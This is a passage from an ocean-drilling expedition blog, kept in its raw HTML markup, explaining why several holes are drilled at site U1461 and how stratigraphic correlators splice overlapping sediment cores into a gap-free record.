I say \u201cexpected 3<sup>rd<\/sup>\u201d because site U1459 was an alternate to U1458 \u2013 and come on, they\u2019re practically on top of each other on the map! (If you couldn\u2019t tell from the map, U1458 is the red star beneath the U1459 orange star \u2013 they are, in fact, only 1 nautical mile apart)<\/div>\n<div>\n<p>&nbsp;<\/p>\n<p>We\u2019re almost finished with our 4<sup>th<\/sup>\u00a0hole at this site (U1461D).\u00a0But, why\u00a04 holes at one site?<\/p>\n<p>In our case, it\u2019s mainly for\u2026.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-24080\" src=\"https:\/\/joidesresolution.org\/\/wp-content\/uploads\/2015\/08\/U1461-Map.jpg\" alt=\"\" width=\"450\" height=\"453\" srcset=\"https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/U1461-Map.jpg 450w, https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/U1461-Map-150x150.jpg 150w, https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/U1461-Map-298x300.jpg 298w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p><strong><dfn title=\"Look up the definition of Stratigraphic Correlation.\">STRATIGRAPHIC CORRELATION<\/dfn>!<\/strong><\/p>\n<p>It might come as a\u00a0<em>huge<\/em>\u00a0surprise that the equipment, engineers, and scientists on board are only\u00a0<em>near perfect<\/em>and won\u2019t ever recover hundreds of meters of sediment all in one go. When a core is recovered, it comes up in core liners approximately 10 m long. This means we might have gaps or discrepancies within those 10 m intervals.\u00a0Thankfully, we have 2\u00a0<u>amazing<\/u>\u00a0stratigraphic correlators on board who\u2019s primary job is to produce a<strong><dfn title=\"Look up the definition of Splice.\">SPLICE<\/dfn><\/strong>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-24078\" src=\"https:\/\/joidesresolution.org\/\/wp-content\/uploads\/2015\/08\/Screen-Shot-2015-08-26-at-3.08.28-AM.png\" alt=\"\" width=\"350\" height=\"205\" srcset=\"https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/Screen-Shot-2015-08-26-at-3.08.28-AM.png 350w, https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/Screen-Shot-2015-08-26-at-3.08.28-AM-300x176.png 300w\" sizes=\"auto, (max-width: 350px) 100vw, 350px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-24079\" src=\"https:\/\/joidesresolution.org\/\/wp-content\/uploads\/2015\/08\/splicing.jpg\" alt=\"\" width=\"450\" height=\"338\" srcset=\"https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/splicing.jpg 450w, https:\/\/joidesresolution.org\/wp-content\/uploads\/2015\/08\/splicing-300x225.jpg 300w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p>A splice is essentially a complete section that contains\u00a0<u>no gaps<\/u>; in order to produce one, the\u00a0correlators\u00a0must have copies of material from multiple holes that they can use to close all of these gaps. These splices are\u00a0<em>really important<\/em>in helping geologists see a complete representation of the sediment layers without interruptions in the correct stratigraphic (essentially, chronological) order.<\/p>\n<p>On the\u00a0<strong>map<\/strong>\u00a0you can see 4 green circles indicating the 4 holes from site U1461. They are approximately 20m from each other, which is very close in the sediment core collecting business. But it\u2019s really important to collect cores in close proximity for\u00a0<strong>good splicing<\/strong>\u00a0to happen. And if I learned anything in statistics, repeated measurements is key to accurate correlation.representation of the sediment layers without interruptions in the correct stratigraphic (essentially, chronological) order.<\/p>\n<p>&nbsp;<\/p>\n<p>As we all know,\u00a0<dfn title=\"Look up the definition of Geology.\">geology<\/dfn>\u00a0is a giant\u00a0pyramid\u00a0of various scientific data supporting each other &#8211; the findings from stratigraphic correlators support and are supported by\u00a0<strong><dfn title=\"Look up the definition of Paleontology.\">paleontology<\/dfn><\/strong>,\u00a0<strong><dfn title=\"Look up the definition of Sedimentology.\">sedimentology<\/dfn><\/strong>\u00a0and\u00a0<strong><dfn title=\"Look up the definition of Paleomagnetism.\">paleomagnetism<\/dfn><\/strong>.
